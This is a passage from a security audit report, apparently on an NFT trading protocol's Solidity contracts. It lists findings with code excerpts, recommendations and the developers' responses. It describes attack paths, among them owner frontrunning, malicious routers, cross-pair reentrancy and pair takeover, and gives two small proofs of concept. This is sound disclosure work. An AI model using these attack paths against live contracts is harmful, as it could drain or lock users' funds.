will be received. Then it calls swapNFTs- ForToken() with 0 as minExpectedTokenOutput; so it will accept any amount of tokens. The swapNFTsForToken() does subtract the Royalties which will result in a lower amount of tokens received and might not be enough to satisfy the requirements of the seller. The same happens in • robustSwapETHForSpecificNFTsAndNFTsToToken and • robustSwapERC20ForSpecificNFTsAndNFTsToToken. Note: Function getSellNFTQuote() of StandardSettings.sol also uses getSellNFTQuote(). However there it is compared to the results of getBuyInfo(); so this is ok as both don't take the royalties into account. Note: getNFTQuoteForSellOrderWithPartialFill() also has to take royalties into account. 8 function getSellNFTQuote(uint256 numNFTs) ... { ( (...., outputAmount, ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(uint256 assetId, uint256 numNFTs) ... { (..., outputAmount, ... ) = bondingCurve().getSellInfo(...); (,, uint256 royaltyTotal) = _calculateRoyaltiesView(assetId, outputAmount); ... outputAmount -= royaltyTotal; } function robustSwapNFTsForToken(...) ... { ... (error,,, pairOutput,) = swapList[i].swapInfo.pair.getSellNFTQuote(swapList[i].swapInfo.nftIds.length); ... if (pairOutput >= swapList[i].minOutput) { ....swapNFTsForToken(..., 0, ...); } ... ,! } function swapNFTsForToken(...) ... { ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(numNFTs[0], _bondingCurve, _factory); (... royaltyTotal) = _calculateRoyalties(nftId(), outputAmount); ... outputAmount -= royaltyTotal; ... _sendTokenOutput(tokenRecipient, outputAmount); ,! } Recommendation: Preferably combine the functions getSellNFTQuote() and getSellNFTQuoteWithRoyal- ties(). Also consider integrating the royalty calculations in _calculateSellInfoAndUpdatePoolParams(). Alternatively call swapNFTsForToken() with the appropriate minExpectedTokenOutput. Make sure changeSpotPriceAndDelta() keeps functioning with the updates. Double check the comment of LSSVMPair.sol#L62. Update getNFTQuoteForSellOrderWithPartialFill() to take royalties into account. Sudorandom Labs: Solved in PR#29 and PR#27. Spearbit: Verified that this is fixed by PR#29 and PR#27. +5.1.8 Error return codes of getBuyInfo() and getSellInfo() are sometimes ignored Severity: High Risk Context: ICurve.sol#L38-L87, LSSVMPair.sol#L206-L266 Description: The functions getBuyInfo() and getSellInfo() return an error code when they detect an error. The rest of the returned parameters then have an unusable/invalid value (0). However, some callers of these functions ignore the error code and continue processing with the other unusable/invalid values. The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() pass through the error code, so their callers have to check the error codes too. 9 function getBuyInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getSellInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getBuyNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); } Recommendation: Always check the return code of the functions getBuyInfo(), getSellInfo(), getBuyN- FTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties(). Sudorandom Labs: Solved in PR#94. Spearbit: Verified that this is fixed by PR#94. +5.1.9 changeSpotPriceAndDelta() only uses ERC721 version of balanceOf() Severity: High Risk Context: StandardSettings.sol#L227-L294 Description: The function changeSpotPriceAndDelta() uses balanceOf() with one parameter. This is the ERC721 variant. In order to support ERC1155, a second parameter of the NFT id has to be supplied. function changeSpotPriceAndDelta(address pairAddress, ...) public { ... if ((newPriceToBuyFromPair < priceToBuyFromPair) && pair.nft().balanceOf(pairAddress) >= 1) { ... } } Recommendation: Detect the use of ERC1155 and use the appropriate balanceOf() version. Sudorandom Labs: Solved in PR#30. Spearbit: Verified that this is fixed by PR#30. 10 5.2 Medium Risk +5.2.1 _pullTokenInputAndPayProtocolFee() doesn't check that tokens are received Severity: Medium Risk Context: LSSVMPairERC20.sol#L34-L115 Description: The function _pullTokenInputAndPayProtocolFee() doesn't verify that it actually received the to- kens after doing safeTransferFrom(). This can be an issue with fee on transfer tokens. This is also an issue with (accidentally) non-existing tokens, as safeTransferFrom() won't revert on that, see POC below. Note: also see issue "Malicious router mitigation may break for deflationary tokens". function _pullTokenInputAndPayProtocolFee(...) ... { ... _token.safeTransferFrom(msg.sender, _assetRecipient, saleAmount); ... } Proof Of Concept: // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import "hardhat/console.sol"; import {ERC20} from "https://raw.githubusercontent.com/transmissions11/solmate/main/src/tokens/ERC20.sol"; ,! import {SafeTransferLib} from "https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/SafeTransferLib.sol"; ,! contract test { using SafeTransferLib for ERC20; function t() public { ERC20 _token = ERC20(address(1)); _token.safeTransferFrom(msg.sender, address(0), 100); console.log("after safeTransferFrom"); } } Recommendation: Check balance before and after safeTransferFrom(). Consider checking the tokens exist in LSSVMPairFactory. Sudorandom Labs: Acknowledged, pair owners should verify the token addresses for tokens they want to list. Separately, fee on transfer tokens are beyond the current scope of the protocol, so undefined behavior is an acceptable risk. Spearbit: Acknowledged. +5.2.2 A malicious settings contract can call onOwnershipTransferred() to take over pair Severity: Medium Risk Context: StandardSettings.sol#L118-L158 Description: The function onOwnershipTransferred() can be called from a pair via call(). This can be done It can either before transferOwnership() or after it. If it is called before then it updates the AssetRecipient. only be called after the transferOwnership() when an alternative (malicious) settings contract is used. In that situation pairInfos[] is overwritten and the original owner is lost; so effectively the pair can be taken over. Note: if the settings contract is malicious then there are different ways to take over the pair, but using this approach the vulnerabilities can be hidden. 11 function onOwnershipTransferred(address prevOwner, bytes memory) public payable { ILSSVMPair pair = ILSSVMPair(msg.sender); require(pair.poolType() == ILSSVMPair.PoolType.TRADE, "Only TRADE pairs"); ... } Recommendation: 1. In onOwnershipTransferred() check that address(this) is the owner of the pair. 2. In onOwnershipTransferred() check that pairInfos[] hasn't been used before. 3. As an extra protection, in function call() of LSSVMPair, disallow calling onOwnershipTransferred() Note: also see related issue "Function call() is risky and can be restricted further". Sudorandom Labs: Solved in PR#34. Spearbit: Verified that PR#34 implements Recommendation (3). +5.2.3 One can attempt to steal a pair's ETH Severity: Medium Risk Context: StandardSettings.sol#L301-L305, Splitter.sol#L26-L29, LSSVMPairETH.sol#L103-L105 Description: Anyone can pass the enrolled pair's address instead of a splitter address in bulkWithdrawFees() to effectively call the pair's withdrawAllETH() instead of a splitter's withdrawAllETH(). Anyone can attempt to steal/drain all the ETH from a pair. However, the pair's withdrawAllETH() sends ETH to the owner, which in this case is the settings contract. The settings contract is unable to receive ETH as currently implemented. So the attempt reverts. Recommendation: This was fixed by the project team, after the review started, by changing the Splitter's function signature from withdrawAllETH() to withdrawAllETHInSplitter() in PR#36. Additionally: 1. Check that none of the addresses in splitterAddresses of bulkWithdrawFees() are pair addresses 2. Change the access control for bulkWithdrawFees() from permissionless to onlyOwner which adds an extra layer of defense 3. Ensure that the settings contract cannot receive ETH to prevent a malicious setting from draining the pair 4. Given PropertyCheckers and Settings not sufficiently restricted, any arbitrary settings contract may acciden- tally be allowed which makes PR#36 ineffective, we need to ensure that a new settings contract should be audited to make sure it doesn't call any of the withdraw functions Sudorandom Labs: Addressed as the function signature for withdrawAllETH has now been changed. Spearbit: Verified that the Splitter's function signature is changed from withdrawAllETH() to withdrawAllETHIn- Splitter() in PR#36. StandardSettings having no receive function addresses Recommendation (3). 12 +5.2.4 swap() could mix tokens with ETH Severity: Medium Risk Context: VeryFastRouter.sol#L102-L212 Description: The function swap() adds the output of swapNFTsForToken() to the ethAmount. Although this only happens when order.isETHSell == true , this value could be set to the wrong value accidentally or on purpose. Then the number of received ERC20 tokens could be added to the ethAmount, which is clearly unwanted. The resulting ethAmount is returned to the user. Luckily the router (normally) doesn't have extra ETH so the impact should be limited. function swap(Order calldata swapOrder) external payable { uint256 ethAmount = msg.value; if (order.isETHSell && swapOrder.recycleETH) { ... outputAmount = pair.swapNFTsForToken(...); ... ethAmount += outputAmount; ... } ... // Send excess ETH back to token recipient if (ethAmount > 0) { payable(swapOrder.tokenRecipient).safeTransferETH(ethAmount); } } Recommendation: Verify the parameters supplied to swap() are compatible with the type of pair. Sudorandom Labs: As the router is not intended to hold ETH, this is an acceptable risk. Spearbit: Acknowledged. +5.2.5 Using a single tokenRecipient in VeryFastRouter could result in locked NFTs Severity: Medium Risk Context: LSSVMRouter.sol#L42-L43 VeryFastRouter.sol#L45, VeryFastRouter.sol#L134-L139, VeryFastRouter.sol#L158-L210, Description: VeryFastRouter uses a single tokenRecipient address for both ETH/tokens and NFTs, unlike LSSVMRouter which uses a separate tokenRecipient and nftRecipient. It is error-prone to have a single tokenRecipient receive both tokens and NFTs, especially when the other/existing LSSVMRouter has a separate nftRecipient. VeryFastRouter.swap() sends both sell order tokens to tokenRe- cipient and buy order NFTs to tokenRecipient. Front-ends integrating with both routers (or migrating to the new one) may surprise users by sending both tokens+NFTs to the same address when interacting with this router. This coupled with the use of nft.transferFrom() may result in NFTs being sent to contracts that are not ERC-721 receivers and get them locked forever. Recommendation: Consider a separate nftRecipient in orders similar to LSSVMRouter. Sudorandom Labs: Solved in PR#57. Spearbit: Verified that this is fixed by PR#57. 13 +5.2.6 Owner can mislead users by abusing changeSpotPrice() and changeDelta() Severity: Medium Risk Context: LSSVMPair.sol#L584-L604 Description: A malicious owner could set up a pair which promises to buy NFTs for high prices. As soon as someone tries to trade, the owner could frontrun the transaction by setting the spotprice to 0 and gets the NFT for free. Both changeSpotPrice() and changeDelta() can be used to immediately change trade parameters where the aftereffects depends on the curve being used. Note: The swapNFTsForToken() parameter minExpectedTokenOutput and swapTokenForSpecificNFTs() param- eter maxExpectedTokenInput protect users against sudden price changes. But users might not always set them in an optimal way. A design goal of the project team is that the pool owner can quickly respond to changing market conditions, to prevent unnecessary losses. function changeSpotPrice(uint128 newSpotPrice) external onlyOwner { ... } function changeDelta(uint128 newDelta) external onlyOwner { ... } Recommendation: Consider introducing a small delay of 1 or 2 blocks to prevent frontrunning. It could be done, for example, with 2 functions : announce(newSpotPrice) which registers timestamp + new price and emits an event (for transparency) followed by the existing changeSpotPrice() which checks if current timestamp > n blocks after the previously announced timestamp. Sudorandom Labs: Acknowledged, callers should use maxInput and minOutput to protect themselves. Spearbit: Acknowledged. +5.2.7 Pair may receive less ETH trade fees than expected under certain conditions Severity: Medium Risk Context: LSSVMPairETH.sol#L48-L55 Description: Depending on the values of protocol fee and royalties, if _feeRecipient == _assetRecipient, the pair will receive less trade fees than expected. Assume a scenario where inputAmount == 100, protocolFee == 30, royaltyTotal == 60 and tradeFeeAmount == 20. This will result in a revert because of underflow in saleAmount -= tradeFeeAmount; when _feeRecipient != _assetRecipient. However, when _feeRecipient == _assetRecipient, the pair will receive trade fees of 100 - 30 - 60 = 10, whereas it normally would have expected 20. Recommendation: One option is to only skip the transfer of trade fees when _feeRecipient == _assetRecipi- ent but allow the subtraction to revert on any underflows. Sudorandom Labs: Solved in PR#59. Spearbit: Verified that this is fixed by PR#59. 14 +5.2.8 Swapping tokens/ETH for NFTs may exhibit unexpected behavior for certain values of input amount, trade fees and royalties Severity: Medium Risk Context: LSSVMPairERC20.sol#L34-L115, LSSVMPairETH.sol#L22-L73 Description: The _pullTokenInputAndPayProtocolFee() function pulls ERC20/ETH from caller/router and pays protocol fees, trade fees and royalties proportionately. Trade fees have a threshold of MAX_FEE == 50%, which allows 2*fee to be 100%. Royalty amounts could technically be any percentage as well. This allows edge cases where the protocol fee, trade fee and royalty amounts add up to be > inputAmount. In LSSVMPairERC20, the ordering of subtracting/transferring the protocolFee and royaltyTotal first causes the final attempted transfer of tradeFeeAmount to either revert because of unavailable funds or uses any balance funds from the pair itself. In LSSVMPairETH, the ordering of subtracting/transferring the tradeFees and royaltyTotal first causes the final attempted transfer of protocolFee to either revert because of unavailable funds or uses any balance funds from the pair itself. Recommendation: Check that protocolFee + royaltyTotal + tradeFeeAmount < inputAmount. Consider mak- ing the order of operations/transfers the same between LSSVMPairERC20 and LSSVMPairETH to make their behav- ior/failure modes consistent. Sudorandom Labs: Acknowledged, no change beyond PR#59 to address the specific trade fee issue. The cases here deal with situations when the royalty percentage is very high (e.g. 50% or more), which we are fine acknowledging but leaving out of scope. Spearbit: Acknowledged. +5.2.9 NFTs may be exchanged for 0 tokens when price decreases too much Severity: Medium Risk Context: LinearCurve.sol#L98-L161 Description: The sale of multiple NFTs, in combination with linear curves, results in a price decrease. When the resulting price is below 0, then getSellInfo() calculates how many NFTs are required to reach a price of 0. However, the complete number of NFTs is transferred from the originator of the transaction, even while the last few NFTs are worth 0. This might be undesirable for the originator. function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 totalPriceDecrease = delta * numItems; if (spotPrice < totalPriceDecrease) { ... uint256 numItemsTillZeroPrice = spotPrice / delta + 1; numItems = numItemsTillZeroPrice; } } Recommendation: Consider letting function getSellInfo() return the number of NFTs that are rational to sell. Then transfer only that many NFTs from the originator of the transaction. Sudorandom Labs: Acknowledged, users intending to sell should use the minExpectedTokenOutput to lower bound the amount of tokens they receive. The routing / pricing calculation is intended to be done by callers beforehand (either on-chain or through a client). No change to the ICurve interface at this time. Spearbit: Acknowledged. 15 +5.2.10 balanceOf() can be circumvented via reentrancy and two pairs Severity: Medium Risk Context: LSSVMPairERC1155.sol#L222-L246 Description: A reentrancy issue can occur if two pairs with the same ERC1155 NFTid are deployed. Via a call to swap NFTs, the ERC1155 callback onERC1155BatchReceived() is called. This callback can start a second NFT swap via a second pair. As the second pair has its own reentrancy modifier, this is allowed. This way the balanceOf() check of _takeNFTsFromSender() can be circumvented. If a reentrant call, to a second pair, supplies a sufficient amount of NFTs then the balanceOf() check of the original call can be satisfied at the same time. We haven't found a realistic scenario to abuse this with the current routers. Permissionless routers will certainly increase the risk as they can abuse isRouter == true. If the router is mali- cious then it also has other ways to steal the NFTs; however with the reentrancy scenario it might be less obvious this is happening. Note: ERC777 tokens also contain such a callback and have the same interface as ERC20 so they could be used in an ERC20 pair. function _takeNFTsFromSender(IERC1155 _nft, uint256 numNFTs, bool isRouter, address routerCaller) ... { ... if (isRouter) { ... uint256 beforeBalance = _nft.balanceOf(_assetRecipient, _nftId); ... router.pairTransferERC1155From(...); // reentrancy with other pair require((_nft.balanceOf(_assetRecipient, _nftId) - beforeBalance) == numNFTs, ...); // circumvented } else { ... } ,! } Recommendation: 1. Thoroughly verify routers before whitelisting them. 2. To protect against reentrancy issues involving multiple pairs, consider putting the reentrancy storage variable on a common location, for example in the LSSVMPairFactory. Sudorandom Labs: Solved in PR#83 and PR#93. Spearbit: Verified that this is fixed by PR#83 and PR#93. +5.2.11 Function call() is risky and can be restricted further Severity: Medium Risk Context: LSSVMPair.sol#L640-L645 Description: The function call() is powerful and thus risky. To reduce the risk it can be restricted further by dis- allowing potentially dangerous function selectors. This is also a step closer to introducing permissionless routers. function call(address payable target, bytes calldata data) external onlyOwner { ILSSVMPairFactoryLike _factory = factory(); require(_factory.callAllowed(target), "Target must be whitelisted"); (bool result,) = target.call{value: 0}(data); require(result, "Call failed"); } 16 Recommendation: Filter out unwanted function selectors, for example for the following functions: pairTransfer- ERC20From(), pairTransferNFTFrom(), pairTransferERC1155From(), onOwnershipTransferred() Sudorandom Labs: Solved in PR#44. Spearbit: Verified that this is fixed by PR#44. +5.2.12 Incorrect newSpotPrice and newDelta may be obtained due to unsafe downcasts Severity: Medium Risk Context: XykCurve.sol#L83 and XykCurve.sol#L130 Description: When calculating newSpotPrice in getBuyInfo(), an unsafe downcast from uint256 into uint128 may occur and silently overflow, leading to much less value for newSpotPrice than expected. function getBuyInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 inputValue, uint256 tradeFee, uint256 protocolFee ) { ... } // get the pair's virtual nft and token reserves uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // calculate the amount to send in uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... // set the new virtual reserves newSpotPrice = uint128(spotPrice + inputValueWithoutFee); // token reserve ... Same happens when calculating newDelta in getSellInfo(): function getSellInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 outputValue, uint256 tradeFee, uint256 protocolFee ) { PoC ... // get the pair's virtual nft and eth/erc20 balance uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // set the new virtual reserves newDelta = uint128(nftBalance + numItems); // nft reserve ... Proof of concept about how this wouldn't revert but silently overflow: 17 import "hardhat/console.sol"; contract test{ constructor() { uint256 a = type(uint128).max; uint256 b = 2; uint128 c = uint128(a + b); console.log(c); // c == 1, no error } } Recommendation: Check if the value would overflow before casting as is already done in other places. This can also be done with libraries such as OpenZeppelin SafeCast // set the new virtual reserves + uint256 _newDelta = nftBalance + numItems + if (_newDelta > type(uint128).max) { + + } - + newDelta = uint128(nftBalance + numItems); // nft reserve newDelta = uint128(_newDelta ); // nft reserve return (Error.SPOT_PRICE_OVERFLOW, 0, 0, 0, 0, 0); Sudorandom Labs: Solved in PR#42. Spearbit: Verified that this is fixed by PR#42. +5.2.13 Fewer checks in pairTransferNFTFrom() and pairTransferERC1155From() than in pairTransfer- ERC20From() Severity: Medium Risk Context: LSSVMRouter.sol#L491-L543, VeryFastRouter.sol#L344-L407 Description: The functions pairTransferNFTFrom() and pairTransferERC1155From() don't verify that the cor- rect type of pair is used, whereas pairTransferERC20From() does. This means actions could be attempted on the wrong type of pairs. These could succeed for example if a NFT is used that supports both ERC721 and ERC1155. Note: also see issue "pairTransferERC20From only supports ERC721 NFTs" The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, "Not ERC20 pair"); ... } function pairTransferNFTFrom(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... } function pairTransferERC1155From(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... } Recommendation: Add comparable checks as in pairTransferERC20From() to the functions pairTransferNFT- From() and pairTransferERC1155From(). Sudorandom Labs: Solved in PR#30. Spearbit: Verified that this is fixed by PR#30. 18 +5.2.14 A malicious collection admin can reclaim a pair at any time to deny enhanced setting royalties Severity: Medium Risk Context: StandardSettings.sol#L164-L178 Description: A collection admin can forcibly/selectively call reclaimPair() prematurely (before the advertised and agreed upon lockup period) to unilaterally break the settings contract at any time. This will effectively lead to a DoS to the pair owner for the enhanced royalty terms of the setting despite paying the upfront fee and agreeing to a fee split in return. This is because the unlockTime is enforced only on the previous pair owner and not on collection admins. A malicious collection admin can advertise very attractive setting royalty terms to entice pair owners to pay a high upfront fee to sign-up for their settings contract but then force-end the contract prematurely. This will lead to the pair owner losing the paid upfront fee and the promised attractive royalty terms. A lax pair owner who may not be actively monitoring SettingsRemovedForPair events before the lockup period will be surprised at the prematurely forced settings contract termination by the collection admin, loss of their earlier paid upfront fee and any payments of default royalty instead of their expected enhanced amounts. Recommendation: Enforce unlockTime on collection admins authorized by authAllowedForToken. Sudorandom Labs: Addressed in PR#85. Spearbit: Verified that this is fixed by PR#85. +5.2.15 PropertyCheckers and Settings not sufficiently restricted Severity: Medium Risk Context: LSSVMPairFactory.sol#L120-L201, LSSVMPairFactory.sol#L430-L433, LSSVMPairFactory.sol#L485- L492, StandardSettingsFactory.sol, PropertyCheckerFactory.sol Description: The LSSVMPairFactory accepts any address for external contracts which contain critical logic but there are no sanity checks done on them. These are the _bondingCurve, _propertyChecker and settings con- tracts. The contracts could perhaps be updated later via a proxy pattern or a create2/selfdestruct pattern which means that it's difficult to completely rely on them. Both _propertyChecker and settings contracts have a factory associated: PropertyCheckerFactory and StandardSettingsFactory. It is straightforward to enforce that only contracts created by the factory can be used. For the bondingCurves there is a whitelist that limits the risk. function createPairERC721ETH(..., ICurve _bondingCurve, ..., address _propertyChecker, ...) ... { ... // no checks on _bondingCurve and _propertyChecker } function toggleSettingsForCollection(address settings, address collectionAddress, bool enable) public { ... // no checks on settings } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { bondingCurveAllowed[bondingCurve] = isAllowed; emit BondingCurveStatusUpdate(bondingCurve, isAllowed); } Recommendation: Enforce that only contracts created by the factories PropertyCheckerFactory and Standard- SettingsFactory can be used. This can be done by keeping a mapping in these contracts which stores all the generated contracts and can then be queried by the factories to verify their origin. Note: this requires that the LSSVMPairFactory is aware of the address of the factories. Sudorandom Labs: Acknowledged, this is intended behavior. The factories for property checking and settings are intended to be open-ended for e.g. future types of property checkers or settings. The property checker factory and settings factory included in the audit are designed to be the recommended ones at start, but not the only choices available (clients may decide filter pairs to show only pairs with values created from the factories). Spearbit: Acknowledged. 19 +5.2.16 A malicious router can skip transfer of royalties and protocol fee Severity: Medium Risk Context: LSSVMPairERC20.sol#L59-L91 Description: A malicious router, if accidentally/intentionally whitelisted by the protocol, may implement pair- TransferERC20From() functions which do not actually transfer the number of tokens as expected. This is within the protocol's threat model as evidenced by the use of before-after balance checks on the _assetRecipient for saleAmount. However, similar before-after balance checks are missing for transfers of royalties and protocol fee payments. the protocol/factory intention- Royalty recipients do not receive their royalties from the malicious router if ally/accidentally whitelists one. The protocol/factory may also accidentally whitelist a malicious router that does not transfer even the protocol fee. Recommendation: Add before-after balance checks for royalty and protocol fee transfers. Sudorandom Labs: Talked internally, we're going to hold-off on this one for now: The factory owner has no incentive to not add routers which don't pay the fee, and if they do (e.g. by accident), they can always disable / add a new one. The gas trade-off here is one we're potentially willing to make. Spearbit: Verified that this is partially fixed in PR#40. Acknowledged the part about protocolFee. +5.2.17 Malicious front-end can sneak intermediate ownership changes to perform unauthorized actions Severity: Medium Risk Context: LSSVMPair.sol#L653-L667 Description: LSSVMPair implements an onlyOwner multicall function to allow owner to batch multiple calls. Natspec indicates that this is "Intended for withdrawing/altering pool pricing in one tx, only callable by owner, can- not change owner." The check require(owner() == msg.sender, "Ownership cannot be changed in multi- call"); with a preceding comment "Prevent multicall from malicious frontend sneaking in ownership change" indicates the intent of the check and that a malicious front-end is within the threat model. While the post-loop check prevents malicious front-ends from executing ownership changing calls that attempt to persist beyond the multicall, this still allows one to sneak in an intermediate ownership change during a call -> perform malicious actions under the new unauthorized malicious owner within onOwnershipTransferred() callback -> change ownership back to originally authorized msg.sender owner before returning from the callback and successfully executing any subsequent (onlyOwner) calls and the existing check. While a malicious front-end could introduce many attack vectors that are out-of-scope for detecting/preventing in backend contracts, an unauthorized ownership change seems like a critical one and warrants additional checks for onlyOwner multicall to prevent malicious actions from being executed in the context of any newly/temporarily unauthorized owner. Recommendation: warnings/documentation for this privileged multicall usage from front-ends. Prevent transferOwnership() call in multicall. Consider adding sufficient Sudorandom Labs: Solved in PR#41. Spearbit: Verified that this is fixed by PR#41. 20 +5.2.18 Missing override in authAllowedForToken prevents authorized admins from toggling settings and reclaiming pairs Severity: Medium Risk Context: LSSVMPairFactory.sol#L330-L377, RoyaltyEngine.sol#L38-L46 Description: Manifold admins are incorrectly not allowed by authAllowedForToken to toggle settings and reclaim their authorized pairs in the protocol context. authAllowedForToken checks for different admin overrides including admin interfaces of NFT marketplaces Nifty, Foundation, Digitalax and ArtBlocks. However, the protocol sup- ports royalties from other marketplaces of Manifold, Rarible, SuperRare and Zora. Of those, Manifold does have getAdmins() interface which is not considered in authAllowedForToken. And it is not certain that the others don't. Recommendation: Add admin support for Manifold and other marketplaces (Rarible, SuperRare and Zora), if available, that are recognized by the protocol. Sudorandom Labs: Acknowledged, no change for now. Adherence to the manifold code is preferred over ex- tending the admin surface for now. The Manifold implementation contract uses AdminControlUpgradeable, which contains an isAdmin function. This function is covered by line LSSVMPairFactory.sol#L338. Spearbit: Acknowledged. +5.2.19 Misdirected transfers to invalid pair variants or non-pair recipients may lead to loss/lock of NFTs/tokens Severity: Medium Risk Context: LSSVMPairFactory.sol#L650-L663, LSSVMPairFactory.sol#L668-L676 Description: Functions depositNFTs() and depositERC20() allow deposits of ERC 721 NFTs and ERC20 tokens after pair creation. While they check that the deposit recipient is a valid pair/variant for emitting an event, the deposit transfers happen prior to the check and without the same validation. With dual home tokens (see weird-erc20), the emit could be skipped when the "other" token is transferred. Also, the isPair() check in depositNFTs() does not specifically check if the pair variant is ERC721_ERC20 or ERC721_ETH. This allows accidentally misdirected deposits to invalid pair variants or non-pair recipients leading to loss/lock of NFTs/tokens. Recommendation: For functions depositNFTs() and depositERC20() apply the specific pair variant check for both events and transfers and check the right tokens/NFT are deposited. Sudorandom Labs: We'll acknowledge the finding, but no additional changes at this time. Only event emission is important to be tracked with the pool type, as pool owners can always withdraw any erc20/721/1155 sent to their pool (in the event they e.g. deposit to a pool they own for a different asset type). Spearbit: Acknowledged. +5.2.20 authAllowedForToken() returns prematurely in certain scenarios causing an authentication DoS Severity: Medium Risk Context: LSSVMPairFactory.sol#L330-L377 Description: Tokens listed on Nifty or Foundation (therefore returning a valid niftyRegistry or foundationTrea- sury) where the proposedAuthAddress is not a valid Nifty sender or a valid Foundation Treasury admin will cause an authentication DoS if the token were also listed on Digitalax or ArtBlocks and the proposedAuthAddress had admin roles on those platforms. This happens because the return values of valid and isAdmin for isValidNiftySender(proposedAuthAddress) and isAdmin(proposedAuthAddress) respectively are returned as-is instead of returning only if/when they are true but continuing the checks for authorization otherwise (if/when they are false) on Digitalax and ArtBlocks. toggleSettingsForCollection and reclaimPair (which utilize authAllowedForToken) would incorrectly fail for valid proposedAuthAddress in such scenarios. 21 return Recommendation: Sender(proposedAuthAddress) and isAdmin(proposedAuthAddress) and return if done for Digitalax). Continue with the authorization checks otherwise, if/when they are false. isAdmin values Check valid and the of for isValidNifty- they are true (as Sudorandom Labs: Addressed in PR#64. Spearbit: Verified that this is fixed by PR#64. 5.3 Low Risk +5.3.1 Partial fills don't recycle ETH Severity: Low Risk Context: VeryFastRouter.sol#L211-L425 Description: After several fixes are applied, the following code exists. If the sell can be filled completely then ETH is recycled, however when a partial fill is applied then ETH is not recycled. This might lead to a revert and would require doing the trade again. This costs extra gas and the trading conditions might be worse then. function swap(Order calldata swapOrder) external payable returns (uint256[] memory results) { ... // Go through each sell order ... if (pairSpotPrice == order.expectedSpotPrice) { // If the pair is an ETH pair and we opt into recycling ETH, add the output to our total accrued if (order.isETHSell && swapOrder.recycleETH) { ... ... order.pair.swapNFTsForToken(... , payable(address(this)), ... ); } // Otherwise, all tokens or ETH received from the sale go to the token recipient else { ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); } } // Otherwise we need to do some partial fill calculations first else { ... ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); // ETH not recycled } // Go through each buy order ... } Recommendation: Consider also recycling ETH in the partial fill case. Sudorandom Labs: There are a few situations where this could happen: • The user intends to sell for more than they are trying to buy, and they are sending 0 ETH. They encounter a partial fill, and they still receive enough ETH to cover their buys. The ETH received from selling is recycled, and the buy succeeds. • The user intends to sell for more than they are trying to buy, and they are sending 0 ETH. They encounter a partial fill, and they do not receive enough ETH to cover their buys. The ETH received from selling is recycled, but the buy still fails because there is not enough ETH. • The user intends to sell for less than they are trying to buy, and they send only enough ETH to cover a buy assuming the sell succeeds. They encounter a partial fill, and they do not receive enough ETH to cover their buys. The ETH received from selling is recycled, but the buy still fails because there is not enough ETH. Given that I expect situations 2 and 3 to be common, I don't think it's worth complicating the code more to handle the case of 1. If this becomes a larger issue in the future, there is always the choice of writing a new router to handle it. But for now, I think I will leave it as-is. 22 Spearbit: Acknowledged. +5.3.2 Wrong allowances can be abused by the owner Severity: Low Risk Context: LSSVMPair.sol#L640-L645 Description: The function call() allows transferring tokens and NFTs that have an allowance set to the pair. Normally, allowances should be given to the router, but they could be accidentally given to the pair. Although call() is protected by onlyOwner, the pair is created permissionless and so the owner could be anyone. Recommendation: In function call() disallow the targets nft() and erc20() (for ERC20 pairs). Sudorandom Labs: This has been solved by the project team after the audit started in PR#34 and PR#52. Spearbit: Verified that this is fixed by PR#34 and PR#52. +5.3.3 Malicious router mitigation may break for deflationary tokens Severity: Low Risk Context: LSSVMPairERC20.sol#L72-L75 Description: ERC20 _pullTokenInputAndPayProtocolFee() for routers has a mitigation for malicious routers by checking if the before-after token balance difference is equal to the transferred amount. This will break for any ERC20 pairs with fee-on-transfer deflationary tokens (see weird-erc20). Note that there has been a real-world exploit related to this with Balancer pool and STA deflationary tokens. Recommendation: Evaluate the feasibility of disallowing ERC20 deflationary tokens vis-a-vis the likelihood of pairs using deflationary tokens leading to this issue. Sudorandom Labs: Acknowledged, no change for now. Pair creators specify their own quote token, i.e. no allowlist for quote tokens. So the risk is there and pair creators will need to select their quote tokens appropriately. Spearbit: Acknowledged. +5.3.4 Inconsistent royalty threshold checks allow some royalties to be equal to sale amount Severity: Low Risk Context: RoyaltyEngine.sol#L197-L210, RoyaltyEngine.sol#L225-L231 Description: Threshold checks on royalty amounts are implemented both in _getRoyaltyAndSpec() and its caller _calculateRoyalties(). While _calculateRoyalties() implements an inclusive check with require(saleAmount >= royaltyTotal, "Royalty exceeds sale price");, (allowing royalty to be equal to sale amount) the different checks in _getRoyaltyAndSpec() on the returned amounts or in the calculations on bps in _computeAmounts() exclude the saleAmount forcing royalty to be less than the saleAmount. However, only Known Origin and SuperRare are missing a similar threshold check in _getRoyaltyAndSpec(). This allows only the Known Origin and SuperRare royalties to be equal to the sale amount as enforced by the check in _calculateRoyalties(). Recommendation: Consider adding checks for Known Origin and SuperRare royalties in _getRoyaltyAndSpec() and remove the redundant/inclusive check from 